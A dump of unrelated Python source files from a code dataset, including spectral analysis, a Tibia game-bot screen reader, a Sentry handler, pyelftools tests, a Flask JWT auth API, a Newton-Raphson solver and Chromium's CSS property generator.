s2.make_spectra_subset(as2,rowsubset=((as2con >= wall[0]) & (as2con <= wall[1])),desc=\"Umbra/penumbra wall\")\n as2pn = s2.make_spectra_subset(as2,rowsubset=((as2con > penumbra[0]) & (as2con < penumbra[1])),desc=\"Penumbra\")\n as2qu = s2.make_spectra_subset(as2,rowsubset=(as2con >= quiet),desc=\"Quiet sun\")\n \n pl.plot(as2um.lmbd, as2um[:,:].mean(axis=0));pl.show()\n\nif False:\n # For spline measurement\n bot,cnt,fwhm,as12,fw13,as13,fw23,as23,err,ew,cont = np.arange(0,11)\n\n wFlat = [1179,1239];\n wH2O = [289, 342]; cH2O = 640.86681253796701\n wFeI = [376, 441]; cFeI = 640.80263785584464\n wSiFe = [467, 519]; cSiFe = 640.72889305314993\n wMyst = [646, 722]; cMyst = 640.57558287431198 #Hand placed limits from mean(axis=0)\n wCNq = [1006,1047]; cCNq = 640.31162454661717 #Hand placed limits from mean(axis=0)\n\n Myst = spc.splineline(wMyst,cMyst,as1.meta)\n FeI = spc.splineline(wFeI ,cFeI ,as1.meta)\n SiFe = spc.splineline(wSiFe,cSiFe,as1.meta)\n H2O = spc.splineline(wH2O ,cH2O ,as1.meta)\n\n print(\"Measuring unknown line\")\n# mesMyst = Myst.measure(as1)\n print(\"Measuring Atmo H2O line\")\n# mesH2O = H2O.measure(as1) # Seems to depend on continuua, so probably not atmo line?\n print(\"Measuring Iron line\")\n# mesFeI = FeI.measure(as1)\n print(\"Measuring Si + Fe line\")\n mesSiFe = SiFe.measure(as1)\n linmap = vis.spline_linemap(mesSiFe,SiFe)\n npz = np.load(\"SplineError.estimate.npz\")\n errs,vals = npz[\"arr_0\"],npz[\"arr_1\"]\n intrErr = er.make_intr_errs(errs,vals) \n errSiFe = er.scale_intr_spline_err(mesSiFe,SiFe,intrErr)\n vis.dan_errplot(linmap,errSiFe).show()\n# pl.plot(mesMyst[:,cont],mesMyst[:,bot],'o')\n# err = np.load(\"Estimate_errSiFe.npy\")\n# errSiFe = er.scale_spline_err(SiFe,mesSiFe,err)\n","repo_name":"Tobychev/Danspectra","sub_path":"6405.py","file_name":"6405.py","file_ext":"py","file_size_in_byte":5936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9798345029","text":"from ScreenAnalizerPackage.Scanner import Scanner\nfrom ScreenAnalizerPackage.ScreenRegion import ScreenRegion\nfrom ScreenAnalizerPackage.Error.NoEnemyFound import NoEnemyFound\nfrom FilesystemPackage import Cv2File\nfrom UtilPackage import String\nimport numpy as np\nimport cv2\nfrom .Enemy import Enemy\nfrom .ScriptEnemy import ScriptEnemy\n\n\nclass BattleList:\n BATTLE_LIST_WIDGET_HEIGHT = 180\n\n @staticmethod\n def create(frame: np.array) -> 'BattleList':\n (left, top, width, height) = Scanner.player_battle_list_position(frame)\n\n start_x = left\n end_x = left + width\n start_y = top\n end_y = top + height + BattleList.BATTLE_LIST_WIDGET_HEIGHT\n\n return BattleList(ScreenRegion(start_x, end_x, start_y, end_y))\n\n def __init__(self, region: ScreenRegion):\n self.region = region\n\n def find_enemies(self, frame: np.array, enemies: list[ScriptEnemy]) -> list[Enemy]:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n battle_list_roi = frame[self.region.start_y: self.region.end_y, self.region.start_x: self.region.end_x]\n\n results = list()\n\n for enemy in enemies:\n enemy_path = f'Wiki/Ui/Battle/Mobs/{String.snake_to_camel_case(enemy.name)}/{enemy.name}_label.png'\n creature_template = Cv2File.load_image(enemy_path)\n\n match = cv2.matchTemplate(battle_list_roi, creature_template, cv2.TM_CCOEFF_NORMED)\n\n # match_locations = (y_match_coords, x_match_coords) >= similarity more than threshold\n match_locations = np.where(match >= 0.9)\n\n # paired_match_locations = [(x, y), (x, y)]\n paired_match_locations = list(zip(*match_locations[::-1]))\n\n ordered_match_locations = sorted(paired_match_locations, key=lambda pair: pair[1], reverse=False)\n\n if ordered_match_locations:\n for (nearest_creature_battle_list_roi_x, nearest_creature_battle_list_roi_y) in ordered_match_locations:\n creature_template_height, creature_template_width = creature_template.shape\n\n frame_creature_position_start_x = self.region.start_x + nearest_creature_battle_list_roi_x\n frame_creature_position_start_y = self.region.start_y + nearest_creature_battle_list_roi_y\n frame_creature_end_x = frame_creature_position_start_x + creature_template_width\n frame_creature_end_y = frame_creature_position_start_y + creature_template_height\n\n battle_list_position = ScreenRegion(\n frame_creature_position_start_x,\n frame_creature_end_x,\n frame_creature_position_start_y,\n frame_creature_end_y\n )\n\n creature = Enemy(enemy.name, enemy.runner, enemy.loot, battle_list_position)\n\n results.append(creature)\n\n if not results:\n raise NoEnemyFound()\n\n return results\n\n def is_nearest_enemy_attacked(self, frame: np.array, nearest_creature_region: ScreenRegion) -> bool:\n start_x = nearest_creature_region.start_x\n start_y = nearest_creature_region.start_y\n end_y = nearest_creature_region.end_y\n\n battle_list_attack_template = Cv2File.load_image(\n 'Wiki/Ui/Battle/Mobs/creature_attacked_placeholder.png',\n grey_scale=False\n )\n\n template_width, *_ = battle_list_attack_template.shape\n\n battle_list_roi = frame[start_y: end_y, start_x - 4: start_x]\n\n battle_list_roi_hsv = cv2.cvtColor(battle_list_roi, cv2.COLOR_BGR2HSV)\n\n # create a red color range\n lower_red = np.array([0, 50, 50])\n upper_red = np.array([10, 255, 255])\n\n # check if red color is present in the roi image\n mask = cv2.inRange(battle_list_roi_hsv, lower_red, upper_red)\n\n return np.any(mask == 255)\n","repo_name":"Adriein/TibiaAcBot","sub_path":"CaveBot/BattleList.py","file_name":"BattleList.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"35654084516","text":"from ppg_runtime.excepthook import ExceptionHandler\nfrom ppg_runtime.excepthook._util import RateLimiter\n\nimport sentry_sdk\n\nclass SentryExceptionHandler(ExceptionHandler):\n \"\"\"\n Send stack traces to Sentry. For instructions on how to set this up, see:\n\n https://build-system.fman.io/manual/#error-tracking\n\n A property of interest in this class is .scope: It lets you send additional\n context information to Sentry, such as the user's operating system, or their\n email. These data are then displayed alongside any stack traces in Sentry.\n\n A limitation of .scope is that it is only available once .init() was called.\n fbs's ApplicationContext performs this call automatically for handlers\n listed in the .exception_handlers property.\n\n The recommended way for setting context information is to use the `callback`\n parameter. You can see its use near the bottom of the following snippet:\n\n from fbs_runtime import platform\n from fbs_runtime.application_context import ApplicationContext, \\\n cached_property, is_frozen\n\n class AppContext(ApplicationContext):\n ...\n @cached_property\n def exception_handlers(self):\n result = super().exception_handlers\n if is_frozen():\n result.append(self.sentry)\n return result\n @cached_property\n def sentry(self):\n # The Sentry client key. Eg. https://4e78a0...@sentry.io/12345.\n dsn = self.build_settings['sentry_dsn']\n # Your app version. Eg. 1.2.3:\n version = self.build_settings['version']\n # The environment in which your app is running. \"local\" by\n # default, but set to \"production\" when you do `fbs release`.\n environment = self.build_settings['environment']\n return SentryExceptionHandler(\n dsn, version, environment, callback=self._on_sentry_init\n )\n def _on_sentry_init(self):\n self.sentry.scope.set_extra('os', platform.name())\n self.sentry.scope.user = {'id': 41, 'email': 'john@gmail.com'}\n\n The optional `rate_limit` parameter to the constructor lets you limit the\n number of requests per minute. It is there to prevent a single client from\n clogging up your Sentry logs.\n \"\"\"\n def __init__(\n self, dsn, app_version, environment, callback=lambda: None,\n rate_limit=10\n ):\n super().__init__()\n self.scope = None\n self._dsn = dsn\n self._app_version = app_version\n self._environment = environment\n self._callback = callback\n self._rate_limiter = RateLimiter(60, rate_limit)\n def init(self):\n sentry_sdk.init(\n self._dsn, release=self._app_version, environment=self._environment,\n attach_stacktrace=True, default_integrations=False\n )\n # Sentry doesn't give us an easy way to set context information\n # globally, for all threads. We work around this by maintaining a\n # reference to \"the\" main scope:\n self.scope = sentry_sdk.configure_scope().__enter__()\n self._callback()\n def handle(self, exc_type, exc_value, enriched_tb):\n if self._rate_limiter.please():\n sentry_sdk.capture_exception((exc_type, exc_value, enriched_tb))","repo_name":"runesc/PPG","sub_path":"ppg_runtime/excepthook/sentry.py","file_name":"sentry.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"52"} +{"seq_id":"12733084095","text":"#-------------------------------------------------------------------------------\n# elftools tests\n#\n# Eli Bendersky (eliben@gmail.com)\n# This code is in the public domain\n#-------------------------------------------------------------------------------\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nfrom utils import setup_syspath; setup_syspath()\nfrom elftools.common.py3compat import BytesIO, iteritems\nfrom elftools.dwarf.lineprogram import LineProgram, LineState, LineProgramEntry\nfrom elftools.dwarf.structs import DWARFStructs\nfrom elftools.dwarf.constants import *\n\n\nclass TestLineProgram(unittest.TestCase):\n def _make_program_in_stream(self, stream):\n \"\"\" Create a LineProgram from the given program encoded in a stream\n \"\"\"\n ds = DWARFStructs(little_endian=True, dwarf_format=32, address_size=4)\n header = ds.Dwarf_lineprog_header.parse(\n b'\\x04\\x10\\x00\\x00' + # initial lenght\n b'\\x03\\x00' + # version\n b'\\x20\\x00\\x00\\x00' + # header length\n b'\\x01\\x01\\x01\\x0F' + # flags\n b'\\x0A' + # opcode_base\n b'\\x00\\x01\\x04\\x08\\x0C\\x01\\x01\\x01\\x00' + # standard_opcode_lengths\n # 2 dir names followed by a NULL\n b'\\x61\\x62\\x00\\x70\\x00\\x00' +\n # a file entry\n b'\\x61\\x72\\x00\\x0C\\x0D\\x0F' +\n # and another entry\n b'\\x45\\x50\\x51\\x00\\x86\\x12\\x07\\x08' +\n # followed by NULL\n b'\\x00')\n\n lp = LineProgram(header, stream, ds, 0, len(stream.getvalue()))\n return lp\n\n def assertLineState(self, state, **kwargs):\n \"\"\" Assert that the state attributes specified in kwargs have the given\n values (the rest are default).\n \"\"\"\n for k, v in iteritems(kwargs):\n self.assertEqual(getattr(state, k), v)\n\n def test_spec_sample_59(self):\n # Sample in figure 59 of DWARFv3\n s = BytesIO()\n s.write(\n b'\\x02\\xb9\\x04' +\n b'\\x0b' +\n b'\\x38' +\n b'\\x82' +\n b'\\x73' +\n b'\\x02\\x02' +\n b'\\x00\\x01\\x01')\n\n lp = self._make_program_in_stream(s)\n linetable = lp.get_entries()\n\n self.assertEqual(len(linetable), 7)\n self.assertIs(linetable[0].state, None) # doesn't modify state\n self.assertEqual(linetable[0].command, DW_LNS_advance_pc)\n self.assertEqual(linetable[0].args, [0x239])\n self.assertLineState(linetable[1].state, address=0x239, line=3)\n self.assertEqual(linetable[1].command, 0xb)\n self.assertEqual(linetable[1].args, [2, 0])\n self.assertLineState(linetable[2].state, address=0x23c, line=5)\n self.assertLineState(linetable[3].state, address=0x244, line=6)\n self.assertLineState(linetable[4].state, address=0x24b, line=7, end_sequence=False)\n self.assertEqual(linetable[5].command, DW_LNS_advance_pc)\n self.assertEqual(linetable[5].args, [2])\n self.assertLineState(linetable[6].state, address=0x24d, line=7, end_sequence=True)\n\n def test_spec_sample_60(self):\n # Sample in figure 60 of DWARFv3\n s = BytesIO()\n s.write(\n b'\\x09\\x39\\x02' +\n b'\\x0b' +\n b'\\x09\\x03\\x00' +\n b'\\x0b' +\n b'\\x09\\x08\\x00' +\n b'\\x0a' +\n b'\\x09\\x07\\x00' +\n b'\\x0a' +\n b'\\x09\\x02\\x00' +\n b'\\x00\\x01\\x01')\n\n lp = self._make_program_in_stream(s)\n linetable = lp.get_entries()\n\n self.assertEqual(len(linetable), 10)\n self.assertIs(linetable[0].state, None) # doesn't modify state\n self.assertEqual(linetable[0].command, DW_LNS_fixed_advance_pc)\n self.assertEqual(linetable[0].args, [0x239])\n self.assertLineState(linetable[1].state, address=0x239, line=3)\n self.assertLineState(linetable[3].state, address=0x23c, line=5)\n self.assertLineState(linetable[5].state, address=0x244, line=6)\n self.assertLineState(linetable[7].state, address=0x24b, line=7, end_sequence=False)\n self.assertLineState(linetable[9].state, address=0x24d, line=7, end_sequence=True)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"kiwibrowser/src","sub_path":"third_party/pyelftools/test/test_dwarf_lineprogram.py","file_name":"test_dwarf_lineprogram.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"10889126582","text":"from flask import request, jsonify\nfrom flask_jwt_extended import (\n create_access_token,\n create_refresh_token,\n get_jwt,\n jwt_required,\n)\n\nfrom database.models import User, Snippet, Collection\nfrom database.models import TokenBlocklist\n\nfrom flask_restful import Resource\nimport datetime\n\nfrom mongoengine.errors import FieldDoesNotExist, NotUniqueError, DoesNotExist\nfrom resources.errors import (\n SchemaValidationError,\n UsernameAlreadyExistsError,\n EmailAlreadyExistsError,\n UnauthorizedError,\n InternalServerError,\n)\n\n#===========================================================================\n# * User Authentication RESTful Resource\n# ? Queries User objects against the User model.\n# All POST methods.\n# Responsible for attaching tokens and hashed passwords to a User doc model,\n# required to perform operations on a Snippet, a Collection and itself.\n#===========================================================================\n\nclass SignupApi(Resource):\n \"\"\"Requests against the Snippet model to `api/auth/signup`\"\"\"\n\n def post(self):\n \"\"\"Create a new User object following the User model.\n\n Yields:\n Save a new User with the required username, email, password\n fields.\n Hash the password.\n Create three Snippets for the user to have some UI to play with\n upon authentication.\n Flags:\n Errors and returns status code with error message,\n 200, otherwise.\n Returns:\n {dict}: JSON Flask Response\n with an access token and a username.\n sets a refresh cookie in headers.\n Note:\n The computation to update, save, reload a Snippet is required to\n ensure Objects have fully landed before they are referenced. It is extra \n complicated for this endpoint as we are awaiting reloads for three models:\n User, Collection and Snippet, all of which vary in `having to exist` before\n the other.\n \"\"\"\n try:\n body = request.get_json()\n user = User(**body)\n\n user.hash_password()\n user.save()\n user.reload()\n\n now = datetime.datetime.now(datetime.timezone.utc)\n\n id = user.id\n username = user.username\n \n # Required to instantiate a new reference to the very same \n # and very new User for the purposes of attaching an owner \n # to the snippets.\n saved_user = User.objects.get(username=username)\n\n snippet_py = Snippet(\n title=\"{}.py\".format(username),\n tags=[\"first post\"],\n description=\"From Cheat-Hub\",\n language=\"python\",\n value=\"print('hello {}')\".format(username),\n addedBy=saved_user,\n addedOn=now,\n )\n\n snippet_js = Snippet(\n title=\"{}.js\".format(username),\n tags=[\"first post\"],\n description=\"From Cheat-Hub\",\n language=\"javascript\",\n value=\"console.log('hello {}');\".format(username),\n addedBy=saved_user,\n addedOn=now,\n )\n\n snippet_sh = Snippet(\n title=\"{}.sh\".format(username),\n tags=[\"first post\"],\n description=\"From Cheat-Hub\",\n language=\"bash\",\n value=\"#!/bin/bash\\n\\necho 'hello {}'\".format(username),\n addedBy=saved_user,\n addedOn=now,\n )\n\n snippet_py.save()\n snippet_py.reload()\n snippet_js.save()\n snippet_js.reload()\n snippet_sh.save()\n snippet_sh.reload()\n\n user.update(push_all__snippets_created=[snippet_py, snippet_js, snippet_sh])\n user.save()\n user.reload()\n\n collection = Collection(\n name=\"Greetings {}\".format(username),\n snippets=[snippet_py, snippet_js, snippet_sh],\n date=now,\n owner=user,\n )\n\n collection.save()\n\n user.update(push__collections=collection)\n user.save()\n\n expires = datetime.timedelta(hours=3)\n access_token = create_access_token(\n identity=str(username), expires_delta=expires\n )\n refresh_token = create_refresh_token(\n identity=str(id), expires_delta=expires\n )\n refresh_cookie = [(\"Set-Cookie\", \"refresh_token={}\".format(refresh_token))]\n\n return (\n {\n \"access_token\": access_token,\n \"username\": username,\n },\n 200,\n refresh_cookie,\n )\n\n except FieldDoesNotExist:\n return {\"message\": \"Request is missing required fields.\"}, 400\n\n except NotUniqueError:\n return {\"message\": \"User with given email address already exists.\"}, 401\n\n except Exception as e:\n return {\"message\": \"Something went wrong.\"}, 500\n\n\nclass LoginApi(Resource):\n \"\"\"Requests against the Snippet model to `api/auth/login`\"\"\"\n\n def post(self):\n \"\"\"Authenticate a User object against the User model.\n\n Yields:\n Check the email.\n Check the password.\n Flags:\n Errors and returns status code with error message,\n 200, otherwise.\n Returns:\n {dict}: JSON Flask Response\n with an access token and a username.\n sets a refresh-cookie in headers.\n \"\"\"\n try:\n body = request.get_json()\n user = User.objects.get(email=body.get(\"email\"))\n authorized = user.check_password(body.get(\"password\"))\n if not authorized:\n raise UnauthorizedError\n\n user.update(set__online=True)\n user.save()\n\n expires = datetime.timedelta(hours=3)\n access_token = create_access_token(\n identity=str(user.username), expires_delta=expires\n )\n refresh_token = create_refresh_token(\n identity=str(user.id), expires_delta=expires\n )\n refresh_cookie = [(\"Set-Cookie\", \"refresh_token={}\".format(refresh_token))]\n\n return (\n {\n \"access_token\": access_token,\n \"username\": user.username,\n },\n 200,\n refresh_cookie,\n )\n\n except (UnauthorizedError, DoesNotExist):\n return {\"message\": \"Invalid username or password.\"}, 401\n\n except Exception as e:\n return {\"message\": \"Something went wrong.\"}, 500\n\n\nclass LogoutApi(Resource):\n \"\"\"Requests against the Snippet model to `api/auth/logout`\"\"\"\n\n @jwt_required()\n def post(self):\n \"\"\"Create a new TokenBlockList document following a User's logout request.\n\n Yields:\n Save an exiting User's access token to the TokenBlockList database.\n This prevents the access token from being used between the logout event\n and its expiration.\n Flags:\n Errors and returns status code with error message,\n 200, otherwise.\n Returns:\n {dict}: JSON Flask Response\n confirmation that the token has been revoked.\n\n \"\"\"\n revoked_token = get_jwt()\n\n jti = revoked_token[\"jti\"]\n owner = revoked_token[\"sub\"]\n created_ts = int(revoked_token[\"iat\"])\n expires_ts = int(revoked_token[\"exp\"])\n\n created = datetime.datetime.utcfromtimestamp(created_ts).strftime(\n \"%Y-%m-%d %H:%M:%S\"\n )\n expires = datetime.datetime.utcfromtimestamp(expires_ts).strftime(\n \"%Y-%m-%d %H:%M:%S\"\n )\n\n user = User.objects.get(username=owner)\n now = datetime.datetime.now(datetime.timezone.utc)\n\n block_token = TokenBlocklist(\n jti=jti,\n created_on=created,\n expires_on=expires,\n revoked_on=now,\n revoked_by=user,\n )\n block_token.save()\n\n user.update(set__online=False)\n\n return {\"message\": \"JWT revoked\"}\n","repo_name":"israelias/cheathub","sub_path":"backend/resources/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":8429,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"30039255495","text":"import math #just if you need to use\nimport numpy #just if you need to use\n\n# Defining ANY Function\ndef f(x):\n f = pow(x,3) - 5*x - 9 # This is just an example\n return f \n# Defining derivative of the function defined above\ndef df(x):\n df = 3*pow(x,2) - 5 # This is just an example\n return df \n \n# Implementing 1D Newton Raphson Method\ndef newtonRaphson(x0,e,n):\n i = 1\n flag = 1\n condition = True\n while condition:\n if df(x0) == 0: #Here I verify if the derivative is equal to zero, and if it is\n# it will print a error msg to user. So, this is a way (But not the unique way. You can use \n# algebric or numerical method to proceed here.), to solve the derivative problem.\n print('Divide by zero error!')\n break\n x1 = x0 - f(x0)/df(x0)\n print('Iteration-%d, x = %0.12f and f(x) = %0.12f' % (i, x1, f(x1)))\n x0 = x1\n i += 1\n if i > n:\n flag = 0\n break\n condition = abs(f(x1)) > e\n if flag == 1:\n print('\\nThe root is: %0.12f' % x1)\n else:\n print('\\nNot Convergent. Maybe You can try a bigger number of interactions.')\n# Input Section\nx0 = float(input('Enter Guess: '))\ne = float(input('Tolerable Error: '))\nn = int(input('Maximum Step: '))\n\n# Starting Newton Raphson Method\nnewtonRaphson(x0,e,n)\n","repo_name":"jgmarquesm/Python","sub_path":"Numerical-Methods/1D Newton-Raphson Method/1D-Newton-Raphson-Method.py","file_name":"1D-Newton-Raphson-Method.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"12449079275","text":"import json5_generator\nfrom name_utilities import (\n upper_camel_case,\n lower_camel_case,\n enum_value_name,\n enum_for_css_property,\n enum_for_css_property_alias\n)\nfrom core.css.field_alias_expander import FieldAliasExpander\n\n\n# These values are converted using CSSPrimitiveValue in the setter function,\n# if applicable.\nPRIMITIVE_TYPES = [\n 'short',\n 'unsigned short',\n 'int',\n 'unsigned int',\n 'unsigned',\n 'float',\n 'LineClampValue'\n]\n\n\n# Check properties parameters are valid.\n# TODO(jiameng): add more flag checks later.\ndef check_property_parameters(property_to_check):\n # Only longhand properties can be interpolable.\n if property_to_check['longhands']:\n assert not(property_to_check['interpolable']), \\\n 'Shorthand property (' + property_to_check['name'] + ') ' \\\n 'cannot be interpolable'\n if property_to_check['longhands']:\n assert 'parseSingleValue' not in property_to_check['property_methods'], \\\n 'Shorthand property (' + property_to_check['name'] + ') ' \\\n 'should not implement parseSingleValue'\n else:\n assert 'parseShorthand' not in property_to_check['property_methods'], \\\n 'Longhand property (' + property_to_check['name'] + ') ' \\\n 'should not implement parseShorthand'\n assert property_to_check['is_descriptor'] or \\\n property_to_check['is_property'], \\\n '{} must be a property, descriptor, or both'.format(\n property_to_check['name'])\n if property_to_check['field_template'] is not None:\n assert not property_to_check['longhands'], \\\n \"Shorthand '{}' cannot have a field_template.\".format(\n property_to_check['name'])\n if property_to_check['mutable']:\n assert property_to_check['field_template'] == 'monotonic_flag', \\\n 'mutable keyword only implemented for monotonic_flag'\n\n\nclass CSSProperties(object):\n def __init__(self, file_paths):\n assert len(file_paths) >= 2, \\\n \"CSSProperties at least needs both CSSProperties.json5 and \\\n ComputedStyleFieldAliases.json5 to function\"\n\n # ComputedStyleFieldAliases.json5. Used to expand out parameters used\n # in the various generators for ComputedStyle.\n self._field_alias_expander = FieldAliasExpander(file_paths[1])\n\n # CSSPropertyValueMetadata assumes that there are at most 1024\n # properties + aliases.\n self._alias_offset = 512\n # 0: CSSPropertyInvalid\n # 1: CSSPropertyVariable\n self._first_enum_value = 2\n self._last_used_enum_value = self._first_enum_value\n\n self._properties_by_id = {}\n self._aliases = []\n self._longhands = []\n self._shorthands = []\n self._properties_including_aliases = []\n\n # Add default data in CSSProperties.json5. This must be consistent\n # across instantiations of this class.\n css_properties_file = json5_generator.Json5File.load_from_files(\n [file_paths[0]])\n self._default_parameters = css_properties_file.parameters\n self.add_properties(css_properties_file.name_dictionaries)\n\n assert self._first_enum_value + len(self._properties_by_id) < \\\n self._alias_offset, \\\n 'Property aliasing expects fewer than %d properties.' % \\\n self._alias_offset\n self._last_unresolved_property_id = max(\n property_[\"enum_value\"] for property_ in self._aliases)\n\n # Process extra files passed in.\n self._extra_fields = []\n for i in range(2, len(file_paths)):\n fields = json5_generator.Json5File.load_from_files(\n [file_paths[i]],\n default_parameters=self._default_parameters)\n self._extra_fields.extend(fields.name_dictionaries)\n for field in self._extra_fields:\n self.expand_parameters(field)\n\n def add_properties(self, properties):\n self._aliases = [\n property_ for property_ in properties if property_['alias_for']]\n self._shorthands = [\n property_ for property_ in properties if property_['longhands']]\n self._longhands = [\n property_ for property_ in properties if (\n not property_['alias_for'] and not property_['longhands'])]\n\n # Sort the properties by priority, then alphabetically. Ensure that\n # the resulting order is deterministic.\n # Sort properties by priority, then alphabetically.\n for property_ in self._longhands + self._shorthands:\n self.expand_parameters(property_)\n check_property_parameters(property_)\n # This order must match the order in CSSPropertyPriority.h.\n priority_numbers = {'Animation': 0, 'High': 1, 'Low': 2}\n priority = priority_numbers[property_['priority']]\n name_without_leading_dash = property_['name']\n if property_['name'].startswith('-'):\n name_without_leading_dash = property_['name'][1:]\n property_['sorting_key'] = (priority, name_without_leading_dash)\n\n sorting_keys = {}\n for property_ in self._longhands + self._shorthands:\n key = property_['sorting_key']\n assert key not in sorting_keys, \\\n ('Collision detected - two properties have the same name and '\n 'priority, a potentially non-deterministic ordering can '\n 'occur: {}, {} and {}'.format(\n key, property_['name'], sorting_keys[key]))\n sorting_keys[key] = property_['name']\n self._longhands.sort(key=lambda p: p['sorting_key'])\n self._shorthands.sort(key=lambda p: p['sorting_key'])\n\n # The sorted index becomes the CSSPropertyID enum value.\n for property_ in self._longhands + self._shorthands:\n property_['enum_value'] = self._last_used_enum_value\n self._last_used_enum_value += 1\n # Add the new property into the map of properties.\n assert property_['property_id'] not in self._properties_by_id, \\\n ('property with ID {} appears more than once in the '\n 'properties list'.format(property_['property_id']))\n self._properties_by_id[property_['property_id']] = property_\n\n self.expand_aliases()\n self._properties_including_aliases = self._longhands + \\\n self._shorthands + self._aliases\n\n def expand_aliases(self):\n for i, alias in enumerate(self._aliases):\n assert not alias['runtime_flag'], \\\n \"Property '{}' is an alias with a runtime_flag, \"\\\n \"but runtime flags do not currently work for aliases.\".format(\n alias['name'])\n aliased_property = self._properties_by_id[\n enum_for_css_property(alias['alias_for'])]\n updated_alias = aliased_property.copy()\n updated_alias['name'] = alias['name']\n updated_alias['alias_for'] = alias['alias_for']\n updated_alias['aliased_property'] = aliased_property['upper_camel_name']\n updated_alias['property_id'] = enum_for_css_property_alias(\n alias['name'])\n updated_alias['enum_value'] = aliased_property['enum_value'] + \\\n self._alias_offset\n updated_alias['upper_camel_name'] = upper_camel_case(alias['name'])\n updated_alias['lower_camel_name'] = lower_camel_case(alias['name'])\n self._aliases[i] = updated_alias\n\n def expand_parameters(self, property_):\n def set_if_none(property_, key, value):\n if key not in property_ or property_[key] is None:\n property_[key] = value\n\n # Basic info.\n property_['property_id'] = enum_for_css_property(property_['name'])\n property_['upper_camel_name'] = upper_camel_case(property_['name'])\n property_['lower_camel_name'] = lower_camel_case(property_['name'])\n property_['is_internal'] = property_['name'].startswith('-internal-')\n name = property_['name_for_methods']\n if not name:\n name = upper_camel_case(property_['name']).replace('Webkit', '')\n set_if_none(property_, 'inherited', False)\n\n # Initial function, Getters and Setters for ComputedStyle.\n property_['initial'] = 'Initial' + name\n simple_type_name = str(property_['type_name']).split('::')[-1]\n set_if_none(property_, 'name_for_methods', name)\n set_if_none(property_, 'type_name', 'E' + name)\n set_if_none(\n property_,\n 'getter',\n name if simple_type_name != name else 'Get' + name)\n set_if_none(property_, 'setter', 'Set' + name)\n if property_['inherited']:\n property_['is_inherited_setter'] = 'Set' + name + 'IsInherited'\n\n # Figure out whether we should generate style builder implementations.\n for x in ['initial', 'inherit', 'value']:\n suppressed = x in property_['style_builder_custom_functions']\n property_['style_builder_generate_%s' % x] = not suppressed\n\n # Expand StyleBuilderConverter params where necessary.\n if property_['type_name'] in PRIMITIVE_TYPES:\n set_if_none(property_, 'converter', 'CSSPrimitiveValue')\n else:\n set_if_none(property_, 'converter', 'CSSIdentifierValue')\n\n # Expand out field templates.\n if property_['field_template']:\n self._field_alias_expander.expand_field_alias(property_)\n\n type_name = property_['type_name']\n if (property_['field_template'] == 'keyword' or\n property_['field_template'] == 'multi_keyword'):\n default_value = type_name + '::' + \\\n enum_value_name(property_['default_value'])\n elif (property_['field_template'] == 'external' or\n property_['field_template'] == 'primitive' or\n property_['field_template'] == 'pointer'):\n default_value = property_['default_value']\n else:\n assert property_['field_template'] == 'monotonic_flag', \\\n \"Please put a valid value for field_template; got \" + \\\n str(property_['field_template'])\n property_['type_name'] = 'bool'\n default_value = 'false'\n property_['default_value'] = default_value\n\n property_['unwrapped_type_name'] = property_['type_name']\n if property_['wrapper_pointer_name']:\n assert property_['field_template'] in ['pointer', 'external']\n if property_['field_template'] == 'external':\n property_['type_name'] = '{}<{}>'.format(\n property_['wrapper_pointer_name'], type_name)\n\n # Default values for extra parameters in ComputedStyleExtraFields.json5.\n set_if_none(property_, 'custom_copy', False)\n set_if_none(property_, 'custom_compare', False)\n set_if_none(property_, 'mutable', False)\n\n @property\n def default_parameters(self):\n return self._default_parameters\n\n @property\n def aliases(self):\n return self._aliases\n\n @property\n def shorthands(self):\n return self._shorthands\n\n @property\n def longhands(self):\n return self._longhands\n\n @property\n def properties_by_id(self):\n return self._properties_by_id\n\n @property\n def properties_including_aliases(self):\n return self._properties_including_aliases\n\n @property\n def first_property_id(self):\n return self._first_enum_value\n\n @property\n def last_property_id(self):\n return self._first_enum_value + len(self._properties_by_id) - 1\n\n @property\n def last_unresolved_property_id(self):\n return self._last_unresolved_property_id\n\n @property\n def alias_offset(self):\n return self._alias_offset\n\n @property\n def extra_fields(self):\n return self._extra_fields\n","repo_name":"kiwibrowser/src","sub_path":"third_party/blink/renderer/build/scripts/core/css/css_properties.py","file_name":"css_properties.py","file_ext":"py","file_size_in_byte":12081,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"2253131751","text":"from pylab import plot, show, legend, title, xlabel, ylabel, axis\r\nfrom matplotlib import pyplot as plt\r\nimport math\r\n\r\n\r\nimport PySimpleGUI as sg\r\n\r\n\r\nsg.theme('Random')\r\n\r\nlayout = [\r\n [sg.Text('Informe os Valores:')],\r\n [sg.Text('Comprimento Inicial (m):', size=(22, 1,)), sg.InputText(size=(10,5))],\r\n [sg.Text('Diâmetro Inicial (m): ', size=(22, 1)), sg.InputText(size=(10,5))],\r\n [sg.Text('Força (N):', size=(22, 1)), sg.InputText(size=(10,5))],\r\n [sg.Text('Comprimento Instantâneo (m):', size=(22, 1)), sg.InputText(size=(10,5))],\r\n [sg.Text('Diâmetro Instantâneo', size=(22, 1)), sg.InputText(size=(10,5))],\r\n [sg.Submit('Registar'), sg.Cancel('Sair')]\r\n]\r\n\r\nwindow = sg.Window('IHM', layout)\r\nevent, values = window.read()\r\nwindow.close()\r\n\r\nsg.popup('Voce registrou os seguintes valores',\r\n 'Comprimeno Inicial',values[0],\r\n 'Diâmetro Inicial', values[1],\r\n 'Força (N)', values[2],\r\n 'Comprimento Instantâneo', values[3],\r\n 'Diâmetro Instantâneo', values[4],\r\n\r\n title=\"Valores Registrados\")\r\n\r\ncomprimento_Inicial = float(values[0])\r\ndiametro_Inicial = 